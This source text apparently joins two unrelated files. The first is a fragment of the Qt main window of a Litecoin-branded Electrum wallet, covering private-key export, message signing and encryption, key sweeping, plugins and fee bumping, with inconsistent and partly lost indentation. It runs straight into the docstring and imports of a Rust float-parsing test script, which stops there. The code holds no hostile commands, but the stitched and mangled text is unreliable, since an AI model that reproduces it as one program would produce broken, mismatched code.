pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum LitecoinFinance, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum LitecoinFinance was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except UserFacingException as e:
self.show_error(e)
return
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum LitecoinFinance was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
    @protected
    def export_privkeys_dialog(self, password):
        """Export all wallet private keys to a file, with a progress dialog.

        Keys are derived on a background thread; Qt signals marshal progress
        and completion back to the GUI thread, and the `done`/`cancelled`
        flags coordinate shutdown with the worker.
        """
        if self.wallet.is_watching_only():
            self.show_message(_("This is a watching-only wallet"))
            return
        if isinstance(self.wallet, Multisig_Wallet):
            self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                              _('It cannot be "backed up" by simply exporting these private keys.'))
        d = WindowModalDialog(self, _('Private keys'))
        d.setMinimumSize(980, 300)
        vbox = QVBoxLayout(d)
        msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                              _("Exposing a single private key can compromise your entire wallet!"),
                              _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
        vbox.addWidget(QLabel(msg))
        e = QTextEdit()
        e.setReadOnly(True)
        vbox.addWidget(e)
        defaultname = 'electrum-ltfn-private-keys.csv'
        select_msg = _('Select file to export your private keys to')
        hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
        vbox.addLayout(hbox)
        b = OkButton(d, _('Export'))
        b.setEnabled(False)
        vbox.addLayout(Buttons(CancelButton(d), b))
        private_keys = {}
        addresses = self.wallet.get_addresses()
        done = False
        cancelled = False
        def privkeys_thread():
            # background worker: derive one key at a time, emitting progress
            for addr in addresses:
                time.sleep(0.1)
                if done or cancelled:
                    break
                privkey = self.wallet.export_private_key(addr, password)
                private_keys[addr] = privkey
                self.computing_privkeys_signal.emit()
            if not cancelled:
                self.computing_privkeys_signal.disconnect()
                self.show_privkeys_signal.emit()
        def show_privkeys():
            # completion handler (GUI thread): display keys, enable Export
            s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
            e.setText(s)
            b.setEnabled(True)
            self.show_privkeys_signal.disconnect()
            nonlocal done
            done = True
        def on_dialog_closed(*args):
            # stop the worker and detach signals if the dialog closes early
            nonlocal done
            nonlocal cancelled
            if not done:
                cancelled = True
                self.computing_privkeys_signal.disconnect()
                self.show_privkeys_signal.disconnect()
        self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
        self.show_privkeys_signal.connect(show_privkeys)
        d.finished.connect(on_dialog_closed)
        threading.Thread(target=privkeys_thread).start()
        if not d.exec_():
            done = True
            return
        filename = filename_e.text()
        if not filename:
            return
        try:
            self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
        except (IOError, os.error) as reason:
            txt = "\n".join([
                _("Electrum LitecoinFinance was unable to produce a private key-export."),
                str(reason)
            ])
            self.show_critical(txt, title=_("Unable to create csv"))
        except Exception as e:
            self.show_message(repr(e))
            return
        self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
    def do_export_labels(self):
        # Export wallet labels via the shared metadata-export dialog.
        export_meta_gui(self, _('labels'), self.wallet.export_labels)
    def import_invoices(self):
        # Import invoices; refresh the invoice list when done.
        import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
    def export_invoices(self):
        # Export invoices to a user-chosen file.
        export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
    def import_requests(self):
        # Import payment requests; refresh the request list when done.
        import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
    def export_requests(self):
        # Export payment requests to a user-chosen file.
        export_meta_gui(self, _('requests'), self.wallet.export_requests)
    def import_contacts(self):
        # Import contacts; refresh the contact list when done.
        import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
    def export_contacts(self):
        # Export contacts to a user-chosen file.
        export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
    """Modal dialog to sweep funds controlled by raw private keys into
    a wallet address, then hand off to the on-chain payment dialog."""
    d = WindowModalDialog(self, title=_('Sweep private keys'))
    d.setMinimumSize(600, 300)
    vbox = QVBoxLayout(d)
    hbox_top = QHBoxLayout()
    hbox_top.addWidget(QLabel(_("Enter private keys:")))
    hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    vbox.addLayout(hbox_top)
    keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
    keys_e.setTabChangesFocus(True)
    vbox.addWidget(keys_e)
    # destination defaults to an unused wallet address; fall back for
    # wallet types that don't implement get_unused_addresses
    addresses = self.wallet.get_unused_addresses()
    if not addresses:
        try:
            addresses = self.wallet.get_receiving_addresses()
        except AttributeError:
            addresses = self.wallet.get_addresses()
    h, address_e = address_field(addresses)
    vbox.addLayout(h)
    vbox.addStretch(1)
    button = OkButton(d, _('Sweep'))
    vbox.addLayout(Buttons(CancelButton(d), button))
    button.setEnabled(False)

    def get_address():
        # returns None when the field does not hold a valid address
        addr = str(address_e.text()).strip()
        if bitcoin.is_address(addr):
            return addr

    def get_pk(*, raise_on_error=False):
        text = str(keys_e.toPlainText())
        return keystore.get_private_keys(text, raise_on_error=raise_on_error)

    def on_edit():
        # enable the Sweep button only when both fields validate
        valid_privkeys = False
        try:
            valid_privkeys = get_pk(raise_on_error=True) is not None
        except Exception as e:
            button.setToolTip(f'{_("Error")}: {repr(e)}')
        else:
            button.setToolTip('')
        button.setEnabled(get_address() is not None and valid_privkeys)

    on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
    keys_e.textChanged.connect(on_edit)
    address_e.textChanged.connect(on_edit)
    address_e.textChanged.connect(on_address)
    on_address(str(address_e.text()))
    if not d.exec_():
        return
    # user pressed "sweep"
    addr = get_address()
    try:
        self.wallet.check_address_for_corruption(addr)
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        raise
    privkeys = get_pk()

    def on_success(result):
        coins, keypairs = result
        # value='!' spends the maximum available amount
        outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
        self.warn_if_watching_only()
        self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)

    def on_failure(exc_info):
        self.on_error(exc_info)

    msg = _('Preparing sweep transaction...')
    # sweep_preparations hits the network, so run it off the GUI thread
    task = lambda: self.network.run_from_another_thread(
        sweep_preparations(privkeys, self.network))
    WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
    """Shared import flow: prompt for whitespace-separated items, feed them
    to *func*, and report which were accepted or rejected.

    :param title: dialog title
    :param header_layout: label text or layout for the dialog header
    :param func: callable taking a list of strings and returning
        (good_inputs, bad_inputs), where bad_inputs is a list of
        (key, error_message) pairs
    """
    text = text_dialog(
        parent=self,
        title=title,
        header_layout=header_layout,
        ok_label=_('Import'),
        allow_multi=True,
        config=self.config,
    )
    if not text:
        return
    keys = str(text).split()
    good_inputs, bad_inputs = func(keys)
    if good_inputs:
        # show at most 10 entries, then elide
        msg = '\n'.join(good_inputs[:10])
        if len(good_inputs) > 10: msg += '\n...'
        self.show_message(_("The following addresses were added")
                          + f' ({len(good_inputs)}):\n' + msg)
    if bad_inputs:
        msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
        if len(bad_inputs) > 10: msg += '\n...'
        self.show_error(_("The following inputs could not be imported")
                        + f' ({len(bad_inputs)}):\n' + msg)
    self.address_list.update()
    self.history_list.update()
def import_addresses(self):
    """Import watch-only addresses (no-op unless the wallet supports it)."""
    if not self.wallet.can_import_address():
        return
    title, msg = _('Import addresses'), _("Enter addresses")+':'
    self._do_import(title, msg, self.wallet.import_addresses)

@protected
def do_import_privkey(self, password):
    """Import WIF private keys; @protected prompts for and supplies the
    wallet password."""
    if not self.wallet.can_import_privkey():
        return
    title = _('Import private keys')
    header_layout = QHBoxLayout()
    header_layout.addWidget(QLabel(_("Enter private keys")+':'))
    header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
    """Show/hide the fiat amount fields and refresh dependent views after
    the fiat-exchange setting changes."""
    b = self.fx and self.fx.is_enabled()
    self.fiat_send_e.setVisible(b)
    self.fiat_receive_e.setVisible(b)
    self.history_list.update()
    self.address_list.refresh_headers()
    self.address_list.update()
    self.update_status()
def settings_dialog(self):
    """Open the modal settings dialog and apply its results on close."""
    from .settings_dialog import SettingsDialog
    d = SettingsDialog(self, self.config)
    # let alias-resolution results recolor the dialog while it is open
    self.alias_received_signal.connect(d.set_alias_color)
    d.exec_()
    self.alias_received_signal.disconnect(d.set_alias_color)
    if self.fx:
        self.fx.trigger_update()
    run_hook('close_settings_dialog')
    if d.need_restart:
        self.show_warning(_('Please restart Electrum LitecoinFinance to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
    """Qt close handler; delegates all teardown to clean_up()."""
    # note that closeEvent is NOT called if the user quits with Ctrl-C
    self.clean_up()
    event.accept()

def clean_up(self):
    """Stop threads, persist window geometry/console history, and detach
    this window from the gui_object.  Idempotent via self._cleaned_up."""
    if self._cleaned_up:
        return
    self._cleaned_up = True
    if self.wallet.thread:
        self.wallet.thread.stop()
        self.wallet.thread = None
    util.unregister_callback(self.on_network)
    self.config.set_key("is_maximized", self.isMaximized())
    if not self.isMaximized():
        # remember position/size only for a normal (non-maximized) window
        g = self.geometry()
        self.wallet.db.put("winpos-qt", [g.left(),g.top(),
                                         g.width(),g.height()])
    # keep only the last 50 console commands
    self.wallet.db.put("qt-console-history", self.console.history[-50:])
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    if self._update_check_thread:
        self._update_check_thread.exit()
        self._update_check_thread.wait()
    if self.tray:
        self.tray = None
    self.gui_object.timer.timeout.disconnect(self.timer_actions)
    self.gui_object.close_window(self)
def plugins_dialog(self):
    """Modal dialog listing plugins with enable/disable checkboxes and
    optional per-plugin settings widgets."""
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400,250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0,1)
    w.setLayout(grid)
    settings_widgets = {}

    def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
        # add or remove the plugin's settings widget in column 1 of row i
        widget = settings_widgets.get(name)  # type: Optional[QWidget]
        if widget and not p:
            # plugin got disabled, rm widget
            grid.removeWidget(widget)
            widget.setParent(None)
            settings_widgets.pop(name)
        elif widget is None and p and p.requires_settings() and p.is_enabled():
            # plugin got enabled, add widget
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)

    def do_toggle(cb, name, i):
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
        # note: all enabled plugins will receive this hook:
        run_hook('init_qt', self.gui_object)

    for i, descr in enumerate(plugins.descriptions.values()):
        full_name = descr['__name__']
        prefix, _separator, name = full_name.rpartition('.')
        p = plugins.get(name)
        if descr.get('registers_keystore'):
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            plugin_is_loaded = p is not None
            # user may toggle a plugin that is either loadable or disableable
            cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                          or plugin_is_loaded and p.can_user_disable())
            cb.setEnabled(cb_enabled)
            cb.setChecked(plugin_is_loaded and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # a broken plugin description must not break the whole dialog
            self.logger.exception(f"cannot display plugin {name}")
    grid.setRowStretch(len(plugins.descriptions.values()), 1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
    """Child-Pays-For-Parent dialog: build a child tx spending an output of
    *parent_tx* back to ourselves with a user-chosen fee, then show it."""
    # first build a zero-fee child just to measure sizes / max spendable
    new_tx = self.wallet.cpfp(parent_tx, 0)
    total_size = parent_tx.estimated_size() + new_tx.estimated_size()
    parent_txid = parent_tx.txid()
    assert parent_txid
    parent_fee = self.wallet.get_tx_fee(parent_txid)
    if parent_fee is None:
        self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
        return
    d = WindowModalDialog(self, _('Child Pays for Parent'))
    vbox = QVBoxLayout(d)
    msg = (
        "A CPFP is a transaction that sends an unconfirmed output back to "
        "yourself, with a high fee. The goal is to have miners confirm "
        "the parent transaction in order to get the fee attached to the "
        "child transaction.")
    vbox.addWidget(WWLabel(_(msg)))
    msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
    vbox.addWidget(WWLabel(_(msg2)))
    grid = QGridLayout()
    grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
    grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
    max_fee = new_tx.output_value()
    grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
    grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
    output_amount = QLabel('')
    grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
    grid.addWidget(output_amount, 2, 1)
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # FIXME with dyn fees, without estimates, there are all kinds of crashes here
    combined_fee = QLabel('')
    combined_feerate = QLabel('')

    def on_fee_edit(x):
        # refresh output amount / combined fee / combined feerate labels
        fee_for_child = fee_e.get_amount()
        if fee_for_child is None:
            return
        out_amt = max_fee - fee_for_child
        out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
        output_amount.setText(out_amt_str)
        comb_fee = parent_fee + fee_for_child
        comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
        combined_fee.setText(comb_fee_str)
        comb_feerate = comb_fee / total_size * 1000
        comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
        combined_feerate.setText(comb_feerate_str)

    fee_e.textChanged.connect(on_fee_edit)

    def get_child_fee_from_total_feerate(fee_per_kb):
        # child fee so that (parent + child) together meet fee_per_kb,
        # clamped to the spendable maximum
        fee = fee_per_kb * total_size / 1000 - parent_fee
        fee = min(max_fee, fee)
        fee = max(total_size, fee)  # pay at least 1 sat/byte for combined size
        return fee

    suggested_feerate = self.config.fee_per_kb()
    if suggested_feerate is None:
        self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
        return
    fee = get_child_fee_from_total_feerate(suggested_feerate)
    fee_e.setAmount(fee)
    grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
    grid.addWidget(fee_e, 3, 1)

    def on_rate(dyn, pos, fee_rate):
        fee = get_child_fee_from_total_feerate(fee_rate)
        fee_e.setAmount(fee)

    fee_slider = FeeSlider(self, self.config, on_rate)
    fee_combo = FeeComboBox(fee_slider)
    fee_slider.update()
    grid.addWidget(fee_slider, 4, 1)
    grid.addWidget(fee_combo, 4, 2)
    grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
    grid.addWidget(combined_fee, 5, 1)
    grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
    grid.addWidget(combined_feerate, 6, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    fee = fee_e.get_amount()
    if fee is None:
        return  # fee left empty, treat is as "cancel"
    if fee > max_fee:
        self.show_error(_('Max fee exceeded'))
        return
    try:
        # rebuild the child with the fee the user actually chose
        new_tx = self.wallet.cpfp(parent_tx, fee)
    except CannotCPFP as e:
        self.show_error(str(e))
        return
    self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
    """Populate *tx* inputs with wallet/network data (blocking dialog).

    Returns whether successful."""
    # note side-effect: tx is being mutated
    assert isinstance(tx, PartialTransaction)
    try:
        # note: this might download input utxos over network
        BlockingWaitingDialog(
            self,
            _("Adding info to tx, from wallet and network..."),
            lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
        )
    except NetworkException as e:
        self.show_error(repr(e))
        return False
    return True
def bump_fee_dialog(self, tx: Transaction):
    """Open the fee-bump (RBF) dialog for *tx*."""
    txid = tx.txid()
    if not isinstance(tx, PartialTransaction):
        tx = PartialTransaction.from_tx(tx)
    if not self._add_info_to_tx_from_wallet_and_network(tx):
        return
    d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
    d.run()

def dscancel_dialog(self, tx: Transaction):
    """Open the cancel-by-double-spend dialog for *tx*."""
    txid = tx.txid()
    if not isinstance(tx, PartialTransaction):
        tx = PartialTransaction.from_tx(tx)
    if not self._add_info_to_tx_from_wallet_and_network(tx):
        return
    d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
    d.run()
def save_transaction_into_wallet(self, tx: Transaction):
    """Add an offline transaction to the wallet history.

    Returns True on success, False if the tx conflicts or cannot be added."""
    win = self.top_level_window()
    try:
        if not self.wallet.add_transaction(tx):
            win.show_error(_("Transaction could not be saved.") + "\n" +
                           _("It conflicts with current history."))
            return False
    except AddTransactionException as e:
        win.show_error(e)
        return False
    else:
        self.wallet.save_db()
        # need to update at least: history_list, utxo_list, address_list
        self.need_update.set()
        msg = (_("Transaction added to wallet history.") + '\n\n' +
               _("Note: this is an offline transaction, if you want the network "
                 "to see it, you need to broadcast it."))
        win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
        return True
def show_cert_mismatch_error(self):
    """Show the SSL-fingerprint-mismatch error once, then close the window.

    The showing_cert_mismatch_error flag prevents re-entrant dialogs."""
    if self.showing_cert_mismatch_error:
        return
    self.showing_cert_mismatch_error = True
    self.show_critical(title=_("Certificate mismatch"),
                       msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
                       _("Electrum LitecoinFinance will now exit."))
    self.showing_cert_mismatch_error = False
    self.close()
|
runtests.py | #!/usr/bin/env python2.7
#
# Copyright 2015 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
"""
Testing dec2flt
===============
These are *really* extensive tests. Expect them to run for hours. Due to the
nature of the problem (the input is a string of arbitrary length), exhaustive
testing is not really possible. Instead, there are exhaustive tests for some
classes of inputs for which that is feasible and a bunch of deterministic and
random non-exhaustive tests for covering everything else.
The actual tests (generating decimal strings and feeding them to dec2flt) is
performed by a set of stand-along rust programs. This script compiles, runs,
and supervises them. The programs report the strings they generate and the
floating point numbers they converted those strings to, and this script
checks that the results are correct.
You can run specific tests rather than all of them by giving their names
(without .rs extension) as command line parameters.
Verification
------------
The tricky part is not generating those inputs but verifying the outputs.
Comparing with the result of Python's float() does not cut it because
(and this is apparently undocumented) although Python includes a version of
Martin Gay's code including the decimal-to-float part, it doesn't actually use
it for float() (only for round()) instead relying on the system scanf() which
is not necessarily completely accurate.
Instead, we take the input and compute the true value with bignum arithmetic
(as a fraction, using the ``fractions`` module).
Given an input string and the corresponding float computed via Rust, simply
decode the float into f * 2^k (for integers f, k) and the ULP.
We can now easily compute the error and check if it is within 0.5 ULP as it
should be. Zero and infinites are handled similarly:
- If the approximation is 0.0, the exact value should be *less or equal*
half the smallest denormal float: the smallest denormal floating point
number has an odd mantissa (00...001) and thus half of that is rounded
to 00...00, i.e., zero.
- If the approximation is Inf, the exact value should be *greater or equal*
to the largest finite float + 0.5 ULP: the largest finite float has an odd
mantissa (11...11), so that plus half an ULP is rounded up to the nearest
even number, which overflows.
Implementation details
----------------------
This directory contains a set of single-file Rust programs that perform
tests with a particular class of inputs. Each is compiled and run without
parameters, outputs (f64, f32, decimal) pairs to verify externally, and
in any case either exits gracefully or with a panic.
If a test binary writes *anything at all* to stderr or exits with an
exit code that's not 0, the test fails.
The output on stdout is treated as (f64, f32, decimal) record, encoded thusly:
- First, the bits of the f64 encoded as an ASCII hex string.
- Second, the bits of the f32 encoded as an ASCII hex string.
- Then the corresponding string input, in ASCII
- The record is terminated with a newline.
Incomplete records are an error. Not-a-Number bit patterns are invalid too.
The tests run serially but the validation for a single test is parallelized
with ``multiprocessing``. Each test is launched as a subprocess.
One thread supervises it: Accepts and enqueues records to validate, observe
stderr, and waits for the process to exit. A set of worker processes perform
the validation work for the outputs enqueued there. Another thread listens
for progress updates from the workers.
Known issues
------------
Some errors (e.g., NaN outputs) aren't handled very gracefully.
Also, if there is an exception or the process is interrupted (at least on
Windows) the worker processes are leaked and stick around forever.
They're only a few megabytes each, but still, this script should not be run
if you aren't prepared to manually kill a lot of orphaned processes.
"""
from __future__ import print_function
import sys
import os
import time
import struct
from fractions import Fraction
from collections import namedtuple
from subprocess import Popen, check_call, PIPE
from glob import glob
import multiprocessing
import threading
import ctypes
